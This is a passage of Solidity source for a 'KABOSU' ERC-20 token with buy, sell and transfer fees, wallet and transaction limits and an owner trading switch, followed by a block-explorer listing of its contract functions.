    function getTaxFees(address sender, address recipient) internal view returns (uint256) {
        if(recipient == pair){return feeOnSell;}
        if(sender == pair){return feeOnBuy;}
        return feeOnTransfer;
    }

    function _transfer(address sender, address recipient, uint256 amount) private {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        if(!_isInFee[sender] && !_isInFee[recipient]){require(tradingEnabled, "tradingEnabled");}
        if(recipient == pair && !_isInFee[sender]){swapTimes += uint256(1);}
        if(!_isInFee[sender] && !_isInFee[recipient] && recipient != address(pair) && recipient != address(DEAD)){
        require((_balances[recipient].add(amount)) <= _maxWalletAmount, "Exceeds maximum wallet amount.");}
        require(amount <= _maxTransactionAmount || _isInFee[sender] || _isInFee[recipient], "TX Limit Exceeded"); 
        if(couldSwapBackKABOSU(sender, recipient, amount)){swapTokesBackKABOSU(); swapTimes = uint256(0);}
        _balances[sender] = _balances[sender].sub(amount);
        uint256 amountReceived = shouldTakeFee(sender, recipient, amount) ? takeFeeKABOSU(sender, recipient, amount) : amount;
        _balances[recipient] = _balances[recipient].add(amountReceived);
        emit Transfer(sender, recipient, amountReceived);
    }

    function takeFeeKABOSU(address senderKABOSU, address recipientKABOSU, uint256 amountKABOSU) internal returns (uint256) {
        if(getTaxFees(senderKABOSU, recipientKABOSU) > 0){
        uint256 feeAmountKABOSU = amountKABOSU.div(denominator).mul(getTaxFees(senderKABOSU, recipientKABOSU));
        _balances[address(this)] = _balances[address(this)].add(feeAmountKABOSU);
        emit Transfer(senderKABOSU, address(this), feeAmountKABOSU);
        if(feeForBurn > uint256(0) && getTaxFees(senderKABOSU, recipientKABOSU) > feeForBurn){_transfer(address(this), address(DEAD), amountKABOSU.div(denominator).mul(feeForBurn));}
        return amountKABOSU.sub(feeAmountKABOSU);} return amountKABOSU;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, msg.sender, _allowances[sender][msg.sender].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
}

Read Contract

allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
owner 0x8da5cb5b → address
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 6 functions

These functions modify contract state and require a wallet transaction to execute.

approve 0x095ea7b3
address spender
uint256 amount
returns: bool
enableTrading 0x8a8c523c
No parameters
renounceOwnership 0x715018a6
No parameters
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool
transferOwnership 0xf2fde38b
address newOwner

Recent Transactions

No transactions found for this address